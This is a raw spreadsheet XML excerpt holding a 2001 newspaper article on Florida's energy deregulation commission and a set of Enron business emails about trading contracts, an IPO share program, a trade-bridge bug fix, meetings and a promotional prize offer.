Panel okays energy plan_x000D_
_x000D_
_x000D_
_x000D_
The governor's panel on energy endorses opening the state's power market to competition, but few expect it to be tackled next year. _x000D_
_x000D_
_x000D_
By STEVE HUETTEL_x000D_
? St. Petersburg Times,_x000D_
published November 16, 2001 _x000D_
  _____  _x000D_
_x000D_
_x000D_
TALLAHASSEE -- The governor's energy study commission Thursday endorsed a plan backed by the state's big utilities to open Florida's wholesale electricity market to competition. _x000D_
_x000D_
The 113-page report will frame the debate on deregulating the state's power business. But commission members acknowledged it's unlikely legislators will tackle the complex plan next year when they are struggling with a budget shortfall and redrawing their electoral districts. _x000D_
_x000D_
Some members of the panel wanted to recommend that the Legislature act first on the part of deregulation that the entrenched state utilities have long fought: giving their out-of-state competitors free rein to build power plants in the Florida. _x000D_
_x000D_
"This (plan) was designed to be so weighty . . . it will never get anywhere in the Legislature," said state Sen. Tom Lee, R-Brandon. "If that happens, the status quo wins." _x000D_
_x000D_
Lee's proposal to let in the outsiders first was narrowly defeated. Opponents argued it wasn't fair to permit such "merchant plants" unless Florida utilities also were allowed to sell their existing plants to unregulated affiliates. _x000D_
_x000D_
Commission chairman Walter Revell defended the report's complexity and said no one expects legislators to turn it into law quickly. _x000D_
_x000D_
"Energy is big, technical, complex, controversial and capital-intensive," said Revell, who oversaw the panel's 14 months of work. "There are no short, simple solutions for a strategic plan for energy for Florida." _x000D_
_x000D_
Gov. Jeb Bush appointed the Florida Energy 2020 Study Commission after out-of-state companies were blocked from building merchant power plants by the Legislature and the state Supreme Court. Florida is the only state that bans merchants from building the most efficient natural gas-fired plants. _x000D_
_x000D_
Bush argued that the state needed to attract more power plants to meet Florida's growing appetite for electricity and avoid California-style power shortages. _x000D_
_x000D_
The panel sent legislators a plan earlier this year that would have let merchants in and allowed state utilities to sell their plants to unregulated affiliates at depreciated values. _x000D_
_x000D_
Critics charged the proposal would let utilities spin off the plants -- paid for by their Florida customers -- at bargain-basement prices. That initial plan died in the Legislature. _x000D_
_x000D_
Commission members tried to fix the problem in the new deregulation plan. _x000D_
_x000D_
Ratepayers should get half of any profits utilities reaped from selling their plants, the report recommends, while company shareholders should eat any loss from a sale. _x000D_
_x000D_
But Department of Environmental Protection secretary David Struhs said the provision wouldn't benefit ratepayers because there won't be any profits to share when utilities sell their plants at the depreciated value. _x000D_
_x000D_
The energy commission had originally proposed taking away the authority of the state Public Service Commission, the governor and Cabinet to reject unpopular power plant projects. But environmentalists strongly opposed the plan. The final report proposed eliminating the PSC's review of new plants but left it up the Legislature to decide the role of the governor and Cabinet. _x000D_
_x000D_
Wednesday, most panel members insisted the report was full of intertwined compromises that wouldn't work on their own. _x000D_
_x000D_
"It would be a tragic mistake to unsettle the balance by taking segments out," said Stephen Mitchell, a Tampa attorney. _x000D_
_x000D_
But Lee suggested state utilities helped make the plan overly complicated by design. If it failed, he said, established players such as Florida Power and Tampa Electric would get to keep their monopoly over the electricity business. _x000D_
_x000D_
A top Florida Power executive said afterward that the way it turned out was "a win-win." _x000D_
_x000D_
"The current system functions well," said Vincent Dolan, vice president for regulatory and public affairs. "Now, we've got a report that could make the system better." _x000D_
_x000D_
-- Steve Huettel can be reached at huettel@sptimes.com &lt;mailto:huettel@sptimes.com&gt; or (813) 226-3384. </t>
  </si>
  <si>
    <t>Sat, 2 Feb 2002 12:02:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'angela.davis@enron.com', 'peter.keohane@enron.com', 'marie.heard@enron.com', 's..bradford@enron.com', 'pinto.leite@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'c..koehler@enron.com', 'gerald.nemec@enron.com', 'carol.st.@enron.com', 'david.portz@enron.com', 'tana.jones@enron.com', 'christian.yoder@enron.com', 'legal &lt;.hall@enron.com&gt;', 'genia.fitzgerald@enron.com', 't..hodge@enron.com', 'mary.cook@enron.com', 'marcus.nettelton@enron.com', 'e..haedicke@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>RE: Final draft of Power GTC (really EEI) for Online Trading with_x000D_
 credit terms (unilateral)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Attached are clean and marked copies of the online trading GTCs for physical power which I have generally discussed with Bryan Murtagh (UBS). You will note that we have elected to use the EEI form by incorporation as we believe this will be the most marketable approach understanding that different forms will be required for many players, eg WSPP._x000D_
_x000D_
I will be doing a final review over the weekend and expect this form to be final by Monday am.  If you have any questions/comments, please let me know.  _x000D_
_x000D_
By copy of this email to Genia, I would ask for her help in cleaning up the document (sorry, beyond my current skills, hopefully, soon to be broadened) and would ask Leslie to carefully review and provide me any thoughts/comments.  Based upon this document, we will have ready by Monday pm, the long form EEI for regular negotiation._x000D_
_x000D_
thanks_x000D_
_x000D_
Elizabeth Sager_x000D_
713-853-6349 w_x000D_
713 864-4023 h  _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 04:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christine.stokes@enron.com'})</t>
  </si>
  <si>
    <t>The New Power Company; Reserved Share Program</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Michelle Lokay/ET&amp;S/Enron on 10/02/2000 _x000D_
11:00 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Enron Announcements                           09/22/2000 08:36 PM_x000D_
	_x000D_
_x000D_
Sent by: Enron Announcements_x000D_
To: Enron US Employees_x000D_
cc:  _x000D_
_x000D_
Subject: The New Power Company; Reserved Share Program_x000D_
_x000D_
Enron U.S Employees:_x000D_
_x000D_
A registration statement relating to a proposed initial public offering of _x000D_
shares of common stock of TNPC, Inc. (TNPC), an affiliate of Enron Corp., has _x000D_
been filed with the Securities and Exchange Commission.  In connection with _x000D_
the proposed offering, TNPC has arranged to reserve a limited number of _x000D_
shares of TNPC's common stock for purchase by Enron U.S. employees and _x000D_
certain other individuals (Reserved Share Program).  If you have any interest _x000D_
in further information regarding the Reserved Share Program, which has a _x000D_
deadline of October 2, 2000, please execute the link to the following site _x000D_
where you will find a preliminary prospectus, a letter explaining the _x000D_
program, an expression of interest form, and an NASD questionnaire related to _x000D_
the offering:_x000D_
_x000D_
http://home.enron.com:84/tnpcsharepgm/index.html_x000D_
_x000D_
NOTE:  In the event that you are unable to execute the above link, please _x000D_
copy the link to the address line of your installed browser._x000D_
_x000D_
The following statements are required to be included in this E-Mail by the _x000D_
rules and regulations of the Securities and Exchange Commission:_x000D_
_x000D_
 "A registration statement relating to the shares has been filed with the _x000D_
Securities and Exchange Commission but has not yet become effective.  These _x000D_
securities may not be sold nor may offers to buy be accepted prior to the _x000D_
time the registration statement becomes effective.  This E-Mail shall not _x000D_
constitute an offer to sell or the solicitation of an offer to buy nor shall _x000D_
there be any sales of these securities in any state in which such offer, _x000D_
solicitation or sale would be unlawful prior to registration or qualification _x000D_
under the securities laws of any such state."_x000D_
_x000D_
 "No offer to buy the securities can be accepted and no part of the purchase _x000D_
price can be received until the registration statement has become effective, _x000D_
and any such offer may be withdrawn or revoked, without obligation or _x000D_
commitment of any kind, at any time prior to notice of its acceptance given _x000D_
after the effective date.  An indication of interest in response to this _x000D_
advertisement will involve no obligation or commitment of any kind."</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 12:02:43 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brad.richter@enron.com'})</t>
  </si>
  <si>
    <t>RE: EOL to Sitara Bridge Trail</t>
  </si>
  <si>
    <t xml:space="preserve">Jay said they tracked down the issue.  I don't understand it either..._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Beck, Sally  _x000D_
Sent:	Tuesday, October 30, 2001 12:34 PM_x000D_
To:	Richter, Brad_x000D_
Subject:	EOL to Sitara Bridge Trail_x000D_
_x000D_
FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hall, Bob M  _x000D_
Sent:	Monday, October  29, 2001 1:14 PM_x000D_
To:	Beck, Sally_x000D_
Subject:	FW: Request for Migration of Sitara EOLBridge into Production_x000D_
_x000D_
looks like a fix has been put in place._x000D_
_x000D_
thanks_x000D_
_x000D_
bob_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lamadrid, Victor  _x000D_
Sent:	Monday, October 29, 2001 11:49 AM_x000D_
To:	Allwein, Robert; Arteaga, Airam; Boudreaux, Shanna; Carter, Tamara; Collins, Joann; Erwin, Stephanie ; Garcia, Clarissa; Gillespie, Steve; Halstead, Lia; Homco, Meredith; Loocke, Kelly; Loving, Scott; Ordway, Chris; Pritchard, Michael; Prudenti, Dan; Ramirez, Robert; Sanchez, Christina; Wood, Tracy_x000D_
Cc:	Superty, Robert; Hall, Bob M; Kinsey, Lisa; Sullivan, Patti; Smith, George F.; Pinion, Richard; Jaquet, Tammy; Farmer, Daren J.; Greif, Donna; Ames, Chuck; Brawner, Sandra F.; Germany, Chris; Goodell, Scott; Hodge, John; Keavey, Peter F.; Mckay, Brad; Mckay, Jonathan; Neal, Scott; Pereira, Susan W.; Pimenov, Vladi; Ring, Andrea; Savvas, Leonidas; Smith, Maureen; Taylor, Craig; Townsend, Judy; Versen, Victoria; Vickers, Frank_x000D_
Subject:	FW: Request for Migration of Sitara EOLBridge into Production_x000D_
_x000D_
All,  A fix to prevent the occurrence of deals not bridging to Sitara from EOL when deal start and end dates were not entered on EOL has been installed and tested.THANKS_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Truong, Dat  _x000D_
Sent:	Thursday, October 25, 2001 5:22 PM_x000D_
To:	Wei, Zhiyong_x000D_
Cc:	Husain, Karima; Lim, Francis S.; Saluja, Gurdip; Sweitzer, Tara; Truong, Dat; Moorer, Torrey; Lamadrid, Victor; Severson, Russ; Grant, George_x000D_
Subject:	Request for Migration of Sitara EOLBridge into Production_x000D_
_x000D_
Hello Zhiyong,_x000D_
	I have implemented an enhancement to avoid the problem of restarting the Sitara EOLBridge when there are missing startdate and enddate.  This fix will take care of this morning's problem._x000D_
_x000D_
EOL will be sent a Failed status similar to the following:_x000D_
	message={EolTransactionId=2101638 TransactionSysDealId="" BridgeEntityName="EOLBridge" Message="Missing StartDate or EndDate" Status="F" BridgeDate="20011025170945CDT"}_x000D_
_x000D_
I throughly tested the change by sending over 400 sample deals from this morning.  Due to the "Bid Week" window, please approve this  bridge enhancement for tonight's migration.  Thank you._x000D_
_x000D_
-Dat Truong x63015_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Truong, Dat  _x000D_
Sent:	Thursday, October 25, 2001 11:11 AM_x000D_
To:	Moorer, Torrey; Lamadrid, Victor; Severson, Russ; Grant, George_x000D_
Cc:	Husain, Karima; Lim, Francis S.; Saluja, Gurdip; Sweitzer, Tara_x000D_
Subject:	Sitara EOL Bridge Problem Today_x000D_
_x000D_
The problem we faced today was due to 2 eol deal packets (2098073, 2099764) not having startdate and enddate.  Missing these 2 tibco message fields caused the bridge to bounce and resulted in the queue to build up while the bridge is starting up. (The bridge takes 2 minute for startup).  Each time these deals are sent/resent, it continuously cause the Sitarar EOLBridge to restart, thus magnifying the buildup of the queue._x000D_
_x000D_
The corrective action we are taking at our end is to build a rejection logic when eol packets do not have start and/or enddate. _x000D_
_x000D_
-Dat Truong </t>
  </si>
  <si>
    <t>Fri, 4 Aug 2000 04:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'peggy.banczak@enron.com', 'stuart.zisman@enron.com', 'ed.iii@enron.com', 'barton.clark@enron.com', 'lisa.mellencamp@enron.com', 'bob.carter@enron.com', 'martin.penkwitz@enron.com'})</t>
  </si>
  <si>
    <t>Environmental Permits Matrix  This is what Ben was talking about.</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Sheila Tweed/HOU/ECT on 08/04/2000 11:46 AM -----_x000D_
_x000D_
	Ben F Jacoby_x000D_
	Sent by: Ben Jacoby_x000D_
	08/03/2000 03:25 PM_x000D_
		 _x000D_
		 To: Sheila Tweed/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Environmental Permits Matrix_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Ben Jacoby/HOU/ECT on 08/03/2000 03:22 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Dave Kellermeyer_x000D_
08/03/2000 03:18 PM_x000D_
To: Ben Jacoby/HOU/ECT@ECT, Jeffrey Keenan/HOU/ECT@ECT, Stephen _x000D_
Plauche/Corp/Enron@Enron, John Moore/Corp/Enron@ENRON, Debbie _x000D_
Chance/Corp/Enron, Gregory Krause/Corp/Enron@ENRON, Steven _x000D_
Krimsky/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: Environmental Permits Matrix_x000D_
_x000D_
Attached is a generic spreadsheet that lists environmental activities and _x000D_
approvals for power projects.  I have divided it into three different sheets _x000D_
that represent:  1) activities/permits required prior to construction, 2) _x000D_
activities/permits after start of construction and prior to commercial _x000D_
operation, and 3) activities/permits after start of commercial operation. _x000D_
_x000D_
I see it being a worthwhile effort to produce a separate list for each _x000D_
project, including schedule milestones and responsible parties.  Whether each _x000D_
list is generated by me, an environmental consultant, legal counsel, the _x000D_
developer, etc. is something we should decide on a project by project basis.  _x000D_
I would appreciate your comments on this._x000D_
_x000D_
By the way, I don't consider this generic spreadsheet to contain an _x000D_
exhaustive list of possible permits.  There are a number of other potential _x000D_
approvals, such as occupancy permit, driveway permit, environmental resource _x000D_
permit, etc. that aren't on this spreadsheet.  We really need to assess each _x000D_
project individually._x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 07:39:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alma.carrillo@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'beverly.miller@enron.com', 'jodi.dobrinski@enron.com', 'galen.coon@enron.com', 'richard.zhang@enron.com', 'shirley.walden@enron.com', 'randy.janzen@enron.com', 'steven.hearn@enron.com', 'janet.mcdaniel@enron.com', 'james.studebaker@enron.com', 'scott.abshire@enron.com', 'cynthia.rivers@enron.com', 'hasan.kedwaii@enron.com', 'michael.bodnar@enron.com', 'kathy.sturr@enron.com', 'dannis.bellard@enron.com', 'jerry.graves@enron.com', 'sue.vanavech@enron.com', 'steven.swanson@enron.com', 'patrick.barry@enron.com', 'bill.bell@enron.com', 'william.aldinger@enron.com', 'harry.woodson@enron.com', 'gary.riojas@enron.com', 'thomas.hebert@enron.com', 'robert.munson@enron.com', 'nancy.callans@enron.com', 'james.cramer@enron.com', 'cuong.nguyen@enron.com', 'ramona.betancourt@enron.com', 'alice.johnson@enron.com', 'lori.saffer@enron.com', 'tracy.minter@enron.com', 'james.carr@enron.com', 'byron.reid@enron.com', 'sherry.forbish@enron.com', 'gary.spraggins@enron.com', 'jean.blair@enron.com', 'laura.giambrone@enron.com', 'christopher.miller@enron.com', 'edward.welsh@enron.com', 'richard.hanagriff@enron.com', 'a..ayres@enron.com', 'margaret.waters@enron.com', 'karen.clapper@enron.com', 'larry.hill@enron.com', 'jill.herrmann@enron.com', 'marion.collins@enron.com', 'bert.hernandez@enron.com', 'jack.howard@enron.com', 'steve.coash@enron.com', 'adrian.chua@enron.com', 'kimberly.watson@enron.com', 'helen.cummings@enron.com', 'david.velen@enron.com', 'jack.boatman@enron.com', 'jeffrey.cochran@enron.com', 'scott.hibbard@enron.com', 'marian.bryant@enron.com', 'larry.davis@enron.com', 'josue.vasquez@enron.com', 'sharon.brown@enron.com', 'robert.hayes@enron.com', 'renee.perry@enron.com', 'dale.eldridge@enron.com', 'raetta.zadow@enron.com', 'toby.summers@enron.com', 'jodie.floyd@enron.com', 'bart.monden@enron.com', 'donald.angeletti@enron.com', 'kathy.washington@enron.com', 'stephen.nimmo@enron.com', 'diana.porter@enron.com', 'steven.chambers@enron.com', 'steven.harris@enron.com', 'tina.dunnaway@enron.com', 'rod.hayslett@enron.com', 'maggie.matheson@enron.com', 'don.stacy@enron.com', 'deborah.dunten@enron.com', 'nancy.bastida@enron.com', 'terry.lehn@enron.com', 'a.ramirez@enron.com', 'gaynel.henley@enron.com', 'jean.adams@enron.com', 'ron.spain@enron.com', 'dale.ratliff@enron.com', 'linda.ward@enron.com', 'gerald.skertich@enron.com', 'debra.scurlock@enron.com', 'ricki.winters@enron.com', 'larry.steward@enron.com', 'chris.greaney@enron.com', 'joe.hoang@enron.com', 'jeff.moore@enron.com', 'rory.calhoun@enron.com', 'elizabeth.brown@enron.com', 'eyituoyo.ekperigin@enron.com', 'david.duff@enron.com', 'crandal.hardy@enron.com', 'michael.wagoner@enron.com'})</t>
  </si>
  <si>
    <t>TEAM CELEBRATION</t>
  </si>
  <si>
    <t xml:space="preserve">Please respond today if you are attending the Team Celebration this Thursday, November 29th at 4pm in the Double Tree._x000D_
Alma_x000D_
36503_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 07:03:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: TW Shipper Imbalance/OBA Meeting</t>
  </si>
  <si>
    <t>Please add to my calendar_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Blair, Lynn  _x000D_
Sent:	Tuesday, October 09, 2001 3:18 PM_x000D_
To:	Corman, Shelley_x000D_
Subject:	TW Shipper Imbalance/OBA Meeting_x000D_
_x000D_
_x000D_
	Shelley, we have established Monday afternoon after Steve Harris' staff_x000D_
	meeting to meet and discuss:_x000D_
_x000D_
		1.  TW Shipper Imbalance Status_x000D_
_x000D_
		2.  OBA termination/Resolution _x000D_
_x000D_
	We will stay in the conference room on 13._x000D_
_x000D_
	Just wanted to let you know this is replacing our Tuesday morning meeting_x000D_
	which was not working well since everyone moved._x000D_
_x000D_
	Thanks. Lynn</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 12:11:10 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laurie.mayer@enron.com'})</t>
  </si>
  <si>
    <t>Reliant Energy Netting Agreement</t>
  </si>
  <si>
    <t>Jay,_x000D_
_x000D_
The documents I located that need to be added to your spreadsheet are as follows:_x000D_
_x000D_
	Reliant Energy Services, Inc.		Base Agreement for Wholesale Power_x000D_
						Supplemental Agreement - ERCOT_x000D_
						EEI - Power_x000D_
_x000D_
	Reliant Energy, Incorporated		Master Power Purchase &amp; Sale Agreement_x000D_
_x000D_
Call if you have any questions._x000D_
_x000D_
Laurie_x000D_
ext. 35557</t>
  </si>
  <si>
    <t>Fri, 25 Feb 2000 05:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.tyo.davis@bakernet.com'})</t>
  </si>
  <si>
    <t>Re: establishment</t>
  </si>
  <si>
    <t xml:space="preserve">Paul:_x000D_
_x000D_
Thanks so much for your help.  I think the legal team you have made available _x000D_
to us is very impressive.  I look foward to our success in Japan.  I have _x000D_
authored many articles on trading in markets around the world.  Would anyone _x000D_
in your shop like to work with me on energy trading  and documentation in _x000D_
Japan?_x000D_
_x000D_
Mark </t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 20:13:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>World Markets Regulatory Analysis and Telecom</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
In addition to World Markets Energy information  &lt;http://esource.enron.com/worldmarket.asp&gt;_x000D_
 and Country Analysis and Forecasting, &lt;http://esource.enron.com/worldmarket_CountryAnalysis.asp&gt; _x000D_
_x000D_
eSource now offers free access to World Markets - Regulatory Analysis _x000D_
_x000D_
_x000D_
_x000D_
World Markets Regulatory Analysis offers:_x000D_
_x000D_
		Daily Reports - Legal, regulatory and policy developments in 185 countries. Comprehensive monitoring of legislative, regulatory and policy_x000D_
 			changes for each country   _x000D_
		Email Alerts -  Automatic daily email alerts of current and impending legal, regulatory and policy changes affecting the development of markets _x000D_
		Daily Analysis - Same-day in-depth assessment of the impact of legal developments by in-house analysts. Features detailed analysis of key legal _x000D_
			changes written exclusively for Regulatory Analysis by a unique network of legal experts in more than 180 countries_x000D_
		Country Reports - Assessments of the legal systems in 185 countries, including rules on establishing a business and restrictions on foreign investors _x000D_
_x000D_
		Access World Markets Regulatory Analysis:  http://esource.enron.com/worldmarket_regulatory.asp_x000D_
_x000D_
										***_x000D_
_x000D_
_x000D_
		For additional new products and reports, visit eSource's Hot Topics page at http://esource.enron.com/hot_topics.asp</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 15:20:54 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: GISB Amendment - National Fuel Marketing Company</t>
  </si>
  <si>
    <t>_x000D_
 Please prepare. Thanks!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Osire, Ann  _x000D_
Sent:	Friday, October 26, 2001 3:15 PM_x000D_
To:	Perlingiere, Debra_x000D_
Cc:	Dickson, Stacy E.; Wallumrod, Ellen; Osire, Ann_x000D_
Subject:	GISB Amendment - National Fuel Marketing Company_x000D_
_x000D_
_x000D_
Debra,_x000D_
_x000D_
Charlie Wojta of the above referenced company has agreed to have the GISB Base Contract we have with them amended to designate ENA as the confirming party.  Details are as follows:_x000D_
_x000D_
Contract #:  96028979_x000D_
E-mail:  cwojta@national-fuel.com_x000D_
Phone: (303) 796-0325_x000D_
Fax: (303 796-0151_x000D_
_x000D_
I will be glad to e-mail Mr. Wojta the amendment once it is ready._x000D_
_x000D_
Thanks, _x000D_
_x000D_
Ann</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 00:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scottw@mathworks.com'})</t>
  </si>
  <si>
    <t>MATLAB at Enron</t>
  </si>
  <si>
    <t>Hello Vince :_x000D_
_x000D_
I'm the Territory Manager for the MathWorks, we develop MATLAB technical_x000D_
software. We've recently developed tools well suited for Energy Trading_x000D_
Industry._x000D_
_x000D_
Enron has used our products in the past, but all of those end-users have_x000D_
left Enron._x000D_
_x000D_
Risk Management and Research groups at Southern Energy, TXU, Dynegy, El_x000D_
Paso Energy, Koch, Calpine, Reliant and others have recently started using_x000D_
our products in the following ways._x000D_
_x000D_
1. Create sophisticated option pricing models, risk analysis models, and_x000D_
stress analysis models. Creating GUI front ends for the end-users._x000D_
2. Pull in Data from ODBC, Corba, and SAS databases to evaluate._x000D_
3. Visualize the results and quantify the solution._x000D_
4. Compile these models and distribute these applications to their_x000D_
Traders, Analysists and Managers with no distribution costs._x000D_
_x000D_
Who should I contact at your company to discuss Enron's situation to see if_x000D_
our can help Enron as it has with our other Energy customers?_x000D_
_x000D_
_x000D_
Thank you for your time and help._x000D_
==================================_x000D_
Scott Wakefield_x000D_
The MathWorks, Inc._x000D_
Phone: (508) 647-7282_x000D_
Fax: (508) 647-4275_x000D_
E-mail: swakefield@mathworks.com_x000D_
http://www.mathworks.com_x000D_
==================================_x000D_
MATLAB News Group:_x000D_
news:comp.soft-sys.matlab_x000D_
==================================_x000D_
Visit the new MathWorks Store and buy MATLAB, Simulink_x000D_
and all of our products online_x000D_
http://www.mathworks.com/store/</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 13:07:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'member@sandbox.com'})</t>
  </si>
  <si>
    <t>URGENT: Claim Your Free DirecTV Satellite System</t>
  </si>
  <si>
    <t>_x000D_
 =09=09=09=09[IMAGE]=09[IMAGE]=09 =09_x000D_
=09[IMAGE]=09 =09=09 =09[IMAGE]=09=09_x000D_
=09=09=09      Dear Jason Wolfe   [IMAGE]         Congratulations, your per=_x000D_
formance in one or more Sandbox games over the past year has earned you a F=_x000D_
REE* DIRECTV Satellite Entertainment System!   [IMAGE] This is a special, l=_x000D_
imited-time offer with no hidden costs. A FREE* DIRECTV Satellite Entertain=_x000D_
ment System with FREE standard professional installation. All you pay is a =_x000D_
$19.95 shipping and handling charge.   Click Here To Claim Your Prize.    Y=_x000D_
our television is about to become a state-of-the-art monitor displaying sta=_x000D_
te-of-the-art digital quality audio and video. With the selection of a DIRE=_x000D_
CTV programming package, you will have a tremendous choice of news, sports,=_x000D_
 movies and more-over 225 channels to choose from!   This offer expires on =_x000D_
or about June 7th. We MUST withdraw the offer at that time due to business =_x000D_
agreements and contracts currently in effect.   Please take advantage of th=_x000D_
is very special opportunity-and get your FREE* DIRECTV Satellite Entertainm=_x000D_
ent System with FREE standard professional installation!   Click Here To Cl=_x000D_
aim Your Prize.    Sincerely,   Stacie Miller Satellite Concepts Authorizat=_x000D_
ion Manager   * Offer expires June 7th, 2001. For free satellite system: mu=_x000D_
st activate system within 30 days of receipt or you will be subject to a $1=_x000D_
25 penalty. For installation offer: Limited time offer for new residential =_x000D_
customers only who purchase a DIRECTV system, schedule an installation, and=_x000D_
 activate DIRECTV programming ($21.99 a month or above). This offer is for =_x000D_
one free standard professional installation per household. Installation of =_x000D_
additional receivers and custom installation available for a charge. Progra=_x000D_
mming, pricing, terms and conditions subject to change. Hardware and progra=_x000D_
mming sold separately. Pricing is residential. Tax is not included. DIRECTV=_x000D_
, Inc. and the cyclone design logo are trademarks of DIRECTV, Inc., a unit =_x000D_
of Hughes Electronics Corp. Offer may not be valid in all areas. Shipping a=_x000D_
nd Handling fee is $19.95 and is not refundable.  To unsubscribe to these t=_x000D_
ypes of emails, please visit: http://www.sandbox.com/sandbox/pub-bin/u?1541=_x000D_
85915+61490106+1057 =09=09=09=09_x000D_
[IMAGE]=09[IMAGE]=09[IMAGE]=09 Exclusive offer for Jason Wolfe [IMAGE] =09[=_x000D_
IMAGE]=09[IMAGE]=09[IMAGE]=09_x000D_
_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 01:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Credit Reserve</t>
  </si>
  <si>
    <t>Fantastic-landmark deal Rick_x000D_
William S Bradford|HOU|ECT wrote on 7/28/00 7:33 pm:_x000D_
_x000D_
Rick,_x000D_
_x000D_
John, Jim and Brad were instrumental in getting this restructuring done.  It _x000D_
feels good when the process works._x000D_
_x000D_
Bill_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
From:  John Suttle                                                            _x000D_
 07/28/2000 10:06 AM                            _x000D_
 _x000D_
_x000D_
To: William S Bradford/HOU/ECT@ECT, Tanya Rohauer/HOU/ECT@ECT, Tracey _x000D_
Irvin/HOU/ECT@ECT, Dutch Quigley/HOU/ECT@ECT_x000D_
cc: Rick Buy/HOU/ECT@ECT, Bradford Larson/HOU/ECT@ECT, James _x000D_
Ledlow/HOU/ECT@ECT _x000D_
Subject: Credit Reserve_x000D_
_x000D_
_x000D_
Please book a $512,087 USD credit reserve for the following deals:_x000D_
_x000D_
Deal #:  E98254.4 and EA8461.1_x000D_
Counterparty:  Barrett Resources Corporation_x000D_
Originating Unit:  ENA_x000D_
_x000D_
Description:  These are existing transactions that have been restructured to _x000D_
compensate Enron for assuming credit risk above the contractual credit _x000D_
lines.  The strike prices for each of the transactions were reduced, _x000D_
resulting in a $512,087 increase in value.  The entirety of this value is to _x000D_
be taken into the Credit Reserve._x000D_
_x000D_
Please call me if you have any questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 05:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hillaryg@wsg.com'})</t>
  </si>
  <si>
    <t>RE: Ben Macklowe's Birthday Party</t>
  </si>
  <si>
    <t xml:space="preserve">No problem!  In fact, it is likely I'll be in NY wed-sat next week--I'm sure _x000D_
I'll stop by the gallery.  Hope to see you..._x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Gallay, Hillary" &lt;HillaryG@WSG.com&gt; on 12/15/2000 01:08:50 PM_x000D_
To: Jeffrey.A.Shankman@enron.com_x000D_
cc:  _x000D_
Subject: RE: Ben Macklowe's Birthday Party_x000D_
_x000D_
_x000D_
Sorry to hear that you won't be joining us. I will be sure to let Ben know_x000D_
that you wanted to attend.  Please do me a favor - an obvious favor but one_x000D_
that I will feel remiss if I do not ask...Please do not send him something_x000D_
before tomorrow night as it is still a surprise. I only ask because you_x000D_
mentioned that you would try to send him something tomorrow.  His actual_x000D_
birthday is on the 22nd so he still has no idea._x000D_
Thank you and perhaps we can all get together on your next trip to NY._x000D_
Be well and have a happy holiday season._x000D_
Hillary_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeffrey.A.Shankman@enron.com [mailto:Jeffrey.A.Shankman@enron.com]_x000D_
Sent: Friday, December 15, 2000 1:12 PM_x000D_
To: HillaryG@WSG.com_x000D_
Subject: Re: Ben Macklowe's Birthday Party_x000D_
_x000D_
_x000D_
_x000D_
Hi Hillary, hope you are well.  Unfortunately, I won't be able to make it_x000D_
tomorrow.  I just couldn't work out the schedule, but it was extremely_x000D_
thoughtful of you to invite me.  I hope you have a great time.....(I'll_x000D_
send something to Ben in the gallery tomorrow)..._x000D_
_x000D_
Best,_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Gallay, Hillary" &lt;HillaryG@WSG.com&gt; on 11/27/2000 02:43:25 PM_x000D_
_x000D_
To:   jeff.shankman@enron.com_x000D_
cc:_x000D_
Subject:  Ben Macklowe's Birthday Party_x000D_
_x000D_
_x000D_
Jeff,_x000D_
It was a pleasure meeting you on Saturday evening.  I hope that you will be_x000D_
able to join us for Ben's 30th celebration.  I would love to send you an_x000D_
official invitation so if you wouldn't mind sending your address to me via_x000D_
this email I'd be happy to send you all of the details._x000D_
Saturday, December 16th at 8:45pm at Gonzales y Gonzales, dinner and_x000D_
dancing._x000D_
If you can make it let me know._x000D_
Thanks,_x000D_
Hillary_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
